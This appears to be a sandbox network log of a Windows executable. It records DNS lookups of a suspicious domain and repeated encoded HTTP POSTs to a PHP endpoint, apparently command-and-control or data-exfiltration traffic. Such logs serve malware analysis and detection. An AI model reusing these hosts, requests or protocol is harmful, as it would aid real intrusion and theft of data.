                                                                    Aug 21, 2024 10:04:51.091294050 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:51.091443062 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:51.096200943 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.443417072 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:51.448864937 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.448887110 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.448961973 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.783622980 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.988327026 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:51.991475105 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.464137077 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.464802980 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.469743013 CEST805307380.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:52.469813108 CEST5307380192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.470335960 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:52.470407009 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.470546007 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.475373030 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:52.818470955 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:52.824717045 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:52.824737072 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:52.824747086 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.142668009 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.273083925 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.273152113 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.389208078 CEST5307280192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.394395113 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.395200968 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.400104046 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.400177956 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.400284052 CEST805307480.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.400290966 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.400362015 CEST5307480192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.405107021 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.755811930 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:53.760854959 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.760870934 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:53.760884047 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.086014986 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.130788088 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.504322052 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.504532099 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.504879951 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.626847982 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.630436897 CEST5307680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.632117033 CEST805307580.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.633536100 CEST5307580192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.635219097 CEST805307680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.635348082 CEST5307680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.635410070 CEST5307680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.640258074 CEST805307680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.819475889 CEST5307680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.819817066 CEST5307780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.824656963 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.824736118 CEST5307780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.824835062 CEST5307780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:54.829745054 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:54.864815950 CEST805307680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:55.115309954 CEST805307680.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:55.115360975 CEST5307680192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:04:55.526478052 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:04:55.646486998 CEST5307780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:05:10.244393110 CEST5307780192.168.2.780.211.144.156
                                                                    Aug 21, 2024 10:05:10.249420881 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:05:10.249444962 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:05:10.546905994 CEST805307780.211.144.156192.168.2.7
                                                                    Aug 21, 2024 10:05:10.599600077 CEST5307780192.168.2.780.211.144.156

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Aug 21, 2024 10:03:01.970956087 CEST5775753192.168.2.71.1.1.1
                                                                    Aug 21, 2024 10:03:02.960694075 CEST5775753192.168.2.71.1.1.1
                                                                    Aug 21, 2024 10:03:03.353825092 CEST53577571.1.1.1192.168.2.7
                                                                    Aug 21, 2024 10:03:03.360971928 CEST53577571.1.1.1192.168.2.7
                                                                    Aug 21, 2024 10:03:31.825341940 CEST53588021.1.1.1192.168.2.7
                                                                    Aug 21, 2024 10:03:45.467075109 CEST53615331.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Aug 21, 2024 10:03:01.970956087 CEST192.168.2.71.1.1.10xab78Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false
                                                                    Aug 21, 2024 10:03:02.960694075 CEST192.168.2.71.1.1.10xab78Standard query (0)373292cm.nyashka.topA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Aug 21, 2024 10:03:03.353825092 CEST1.1.1.1192.168.2.70xab78No error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false
                                                                    Aug 21, 2024 10:03:03.360971928 CEST1.1.1.1192.168.2.70xab78No error (0)373292cm.nyashka.top80.211.144.156A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • 373292cm.nyashka.top

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.74970980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:03.365466118 CEST328OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 344
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:03.725717068 CEST344OUTData Raw: 05 01 04 03 06 09 04 06 05 06 02 01 02 07 01 02 00 01 05 01 02 0d 03 0e 01 03 0f 07 03 07 01 06 0c 01 06 0f 07 06 06 06 0c 57 06 0b 04 06 07 0e 04 50 0e 0c 0c 57 04 05 06 54 06 07 04 55 06 0c 02 50 0e 0b 07 06 06 02 0d 00 0b 01 0a 0d 0d 06 06 05
                                                                    Data Ascii: WPWTUPUZVUP\L~@|~N`arXbuR|UitBlM|c`JolQK{^jKmlvgxL}u~V@Axm~bi
                                                                    Aug 21, 2024 10:03:04.058492899 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:04.154150009 CEST1236INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 1320
                                                                    Connection: keep-alive
                                                                    Data Raw: 56 4a 7e 01 6c 6d 70 5a 79 62 59 5b 7c 4f 56 58 7d 77 67 0c 7f 06 6a 52 6d 63 5a 4d 7f 72 78 00 74 5d 53 4f 79 61 65 02 62 58 5a 01 7e 71 78 01 55 4b 71 09 74 5c 7f 4b 7f 04 75 04 7f 5e 62 0d 79 66 60 08 7e 73 7f 4a 62 62 5f 06 60 58 6a 59 7e 62 62 02 7f 7f 70 4e 7e 5e 77 06 62 5c 7b 06 7c 5c 69 05 69 73 75 07 7b 49 52 05 7b 77 70 05 7b 53 74 5d 79 62 56 05 7a 63 76 41 7d 73 74 00 78 59 77 5f 7d 72 5a 5b 75 5f 7c 47 7a 51 41 5b 68 5e 7c 40 7f 71 6e 54 76 52 6b 5f 6f 6c 74 03 77 06 6e 0d 79 62 6d 47 6a 42 54 06 6f 72 66 46 77 63 5e 5a 76 07 64 07 76 71 7a 50 7e 5d 7a 06 77 62 6d 4f 61 66 73 50 7e 6c 65 04 60 6f 7c 04 7f 70 7c 02 6f 6c 5a 5a 6c 06 76 4b 7c 6d 5e 08 76 67 6f 5d 7e 62 65 50 7e 43 5e 55 7b 7e 72 04 7f 72 53 03 7b 5d 46 51 6b 52 5d 52 7d 60 56 0b 7d 77 75 5d 6c 6d 7b 49 7b 71 64 00 7e 71 78 5b 7e 49 55 0a 68 4e 5c 55 7b 63 78 07 7d 61 7c 49 63 5a 7d 51 7b 5c 79 06 75 66 56 4b 7e 58 56 06 7e 66 71 0d 76 72 73 06 7f 5c 5b 05 7f 67 6a 0d 7b 58 74 09 7e 73 67 02 76 62 75 02 76 71 69 00 7c 4f [TRUNCATED]
                                                                    Data Ascii: VJ~lmpZybY[|OVX}wgjRmcZMrxt]SOyaebXZ~qxUKqt\Ku^byf`~sJbb_`XjY~bbpN~^wb\{|\iisu{IR{wp{St]ybVzcvA}stxYw_}rZ[u_|GzQA[h^|@qnTvRk_oltwnybmGjBTorfFwc^ZvdvqzP~]zwbmOafsP~le`o|p|olZZlvK|m^vgo]~beP~C^U{~rrS{]FQkR]R}`V}wu]lm{I{qd~qx[~IUhN\U{cx}a|IcZ}Q{\yufVK~XV~fqvrs\[gj{Xt~sgvbuvqi|Or~|t@~gDuOY{Ly~`iywtxg^MxSYHybdHzcz}``{gx~\svap||Q}g`|qaAv|Zx|tIt`byqeJ~RfxOfFvsswa^var|NrtLiBv[`RyLwRp|]hJxBz`v}`wgR~rvB}SU{mnN}\y}pxAlZNph}YT{CQ{bt~qg}wQ@~`Wys^M}rtFtMqBzO[IuHZ}f|}vu@wbQ\}|gzxXZO~ssubaAtOiqbI~BlA~IUuO{rqI}N_{whywpxCQzblHxsPL{]NZxYsY~qx\wa|}BUYh@}bqAvRwZolUYw^vzqm}BT_z\yvxBagx[L~Jx^bcrT^veoSkRv^wk_|p|K{oglNXh}l`g^jaqTzSYQfn^jfbQYwRS{@QlkPWta^o~Zzu{Z|Xg}Yg~puncx~rtK`]amOj^vcY|fdfive{WOz[hdNTzoVR`V[[nN]bnJUvzyRRL~wkFua{Jy\uJz]OZloBUtAl^Do{AQ\_}]s|lkVTdaNYLwtR`d{ZFQhbO[Ao]Da}UnXFQQz|^]\NtiZDp\@PkeAZq@bUMizYcUCS\wElc[z]zZ~zsWcdAR~aVRn^VTaXQaB [TRUNCATED]
                                                                    Aug 21, 2024 10:03:04.154189110 CEST241INData Raw: 44 50 7e 66 5b 53 64 06 5f 6f 00 00 09 51 59 60 49 5d 63 0d 5e 5b 62 6d 59 7e 5c 79 67 52 55 59 09 6a 64 63 54 6d 06 60 58 51 71 6e 4a 7a 73 01 5e 7f 76 7f 40 6c 6b 73 45 6f 0b 77 58 7b 75 7f 5f 6f 60 0e 41 50 7c 6f 5d 57 64 00 55 6a 04 0f 42 5c
                                                                    Data Ascii: DP~f[Sd_oQY`I]c^[bmY~\ygRUYjdcTm`XQqnJzs^v@lksEowX{u_o`AP|o]WdUjB\rYEiocShf}qQpE|UU][uJPbP@QT\WY`_Z[gy`bUx^\^p_O\boNRHcU@iA[RZQca_{SVPpZN_jaNP~No[ChHAPYUHVpoRjgxzZ~G|TV_TsBUbVCQ_PcTQZ@je|p^zRm
                                                                    Aug 21, 2024 10:03:04.188143015 CEST304OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 384
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:04.402678013 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:04.402890921 CEST384OUTData Raw: 5f 5c 5c 5e 54 46 54 5d 5b 5f 5a 51 59 50 58 54 57 5b 5d 5b 57 58 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\\^TFT][_ZQYPXTW[][WXSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-;36$ 09Y>??-=^+. <+R4!0*:$#=/.&F$.Y/
                                                                    Aug 21, 2024 10:03:04.699708939 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 26 55 2a 36 36 1f 26 3b 27 08 30 23 32 55 2a 3e 3f 5a 2b 2d 22 05 30 06 04 07 26 2e 23 0c 30 15 25 58 2b 00 39 0b 32 59 20 02 2e 24 2b 5d 0c 13 22 5f 34 04 0f 04 31 02 33 03 3e 06 0a 06 36 5a 36 5c 3c 3a 22 0a 28 3c 2f 00 2b 07 09 58 3f 04 21 0b 2e 28 35 5e 2d 09 2e 1c 20 14 2b 52 0d 11 24 1d 28 3d 25 55 2a 10 2b 14 36 38 38 00 27 2e 26 54 24 32 08 10 24 5f 27 03 26 0b 21 12 24 0f 08 0e 32 02 22 58 31 11 26 0f 21 22 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: &U*66&;'0#2U*>?Z+-"0&.#0%X+92Y .$+]"_413>6Z6\<:"(</+X?!.(5^-. +R$(=%U*+688'.&T$2$_'&!$2"X1&!"#T,"W3UV
                                                                    Aug 21, 2024 10:03:04.749056101 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1868
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:04.958807945 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:04.959017992 CEST1868OUTData Raw: 5f 55 59 53 54 45 51 59 5b 5f 5a 51 59 55 58 57 57 5c 5d 5d 57 51 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _UYSTEQY[_ZQYUXWW\]]WQS]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.X8;A5$7>=[<\<X=Z+>7Z",#4"$W(98#01,>&F$.Y/-
                                                                    Aug 21, 2024 10:03:05.566585064 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 09 1d 25 0f 29 25 36 1f 31 15 28 51 30 0a 3d 0b 2b 3e 3f 5a 2b 2d 31 5e 33 5e 3e 00 32 2e 38 1e 24 28 31 5b 28 3d 31 0f 31 3c 23 13 3a 1e 2b 5d 0c 13 22 58 34 04 26 5b 32 02 3c 5c 29 2b 3c 04 20 3c 26 5b 3f 39 22 08 3c 01 20 5b 3c 29 2b 5d 3c 5c 32 52 2c 5e 3e 03 39 33 2d 0e 22 3e 2b 52 0d 11 24 1f 3f 04 31 56 29 3e 11 5e 21 16 30 07 33 03 22 55 31 21 26 55 24 07 23 04 26 1c 13 12 27 0f 39 1c 26 05 36 5a 25 2f 26 0e 21 08 23 54 2c 00 22 57 01 33 55 56
                                                                    Data Ascii: %)%61(Q0=+>?Z+-1^3^>2.8$(1[(=11<#:+]"X4&[2<\)+< <&[?9"< [<)+]<\2R,^>93-">+R$?1V)>^!03"U1!&U$#&'9&6Z%/&!#T,"W3UV


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.74971280.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:04.329427958 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:04.677340984 CEST2544OUTData Raw: 5f 50 5c 51 54 45 51 5c 5b 5f 5a 51 59 55 58 57 57 50 5d 5c 57 50 53 59 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _P\QTEQ\[_ZQYUXWWP]\WPSYYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.]; #C5=(_79*0\?=!_((#Z+P72,V+7X7#5_,&F$.Y/-
                                                                    Aug 21, 2024 10:03:05.021353006 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:05.157346010 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.74971480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:05.952052116 CEST305OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Aug 21, 2024 10:03:06.302434921 CEST2544OUTData Raw: 5f 52 59 50 54 45 54 5f 5b 5f 5a 51 59 5e 58 56 57 5b 5d 59 57 5f 53 5d 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _RYPTET_[_ZQY^XVW[]YW_S]YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U.^,U8#>7#!Y>7>=)(=("/4!1?? 401/>&F$.Y/
                                                                    Aug 21, 2024 10:03:06.659027100 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:06.795371056 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[
                                                                    Aug 21, 2024 10:03:07.009253979 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:06 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.74971880.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:07.106719971 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2544
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:07.458755970 CEST2544OUTData Raw: 5a 50 59 55 54 46 51 59 5b 5f 5a 51 59 54 58 5e 57 51 5d 5f 57 58 53 5a 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZPYUTFQY[_ZQYTX^WQ]_WXSZYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U./0?A" \# %]>.7(X:( #?#W#<V+_(40:8>&F$.Y/)
                                                                    Aug 21, 2024 10:03:07.817440987 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:07.955209970 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.74971980.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:08.551778078 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 2536
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:08.896136045 CEST2536OUTData Raw: 5f 5c 59 52 51 45 54 5a 5b 5f 5a 51 59 57 58 54 57 5f 5d 5e 57 51 53 54 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: _\YRQETZ[_ZQYWXTW_]^WQSTYY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U._/#(" #!Y*\+>&<47 1S?) %.>&F$.Y/)
                                                                    Aug 21, 2024 10:03:09.229041100 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:09.366518974 CEST158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 3b 55 5f 5b
                                                                    Data Ascii: ;U_[


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.74972480.211.144.156807840C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Aug 21, 2024 10:03:10.670357943 CEST329OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                    Host: 373292cm.nyashka.top
                                                                    Content-Length: 1852
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Aug 21, 2024 10:03:11.021135092 CEST1852OUTData Raw: 5a 50 5c 51 51 42 54 5c 5b 5f 5a 51 59 57 58 5e 57 5e 5d 5f 57 59 53 5b 59 59 5f 58 5b 5f 5a 57 5f 5e 52 5a 50 5b 50 5a 58 5e 59 5c 55 56 54 5a 5a 5f 58 58 58 5f 50 5c 5d 59 56 50 52 5d 50 5c 59 59 5c 58 55 5b 57 59 42 5e 5a 53 42 58 58 5d 56 5b
                                                                    Data Ascii: ZP\QQBT\[_ZQYWX^W^]_WYS[YY_X[_ZW_^RZP[PZX^Y\UVTZZ_XXX_P\]YVPR]P\YY\XU[WYB^ZSBXX]V[TRW]_\S\UR^YTU[^^_U^[_QXA\Z_Y^_]XUXWXSZ]Z][QCW\Q_RXVQY[Y_P_E\WS]^\TXSZ\[G]Q[^UB\X[XTX^ZXRZ^\YQCXYY_Q^U-/#85=07 %>-X<*('#<4"/+\" 5\,>&F$.Y/
                                                                    Aug 21, 2024 10:03:11.345338106 CEST25INHTTP/1.1 100 Continue
                                                                    Aug 21, 2024 10:03:11.481389999 CEST308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 21 Aug 2024 08:03:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
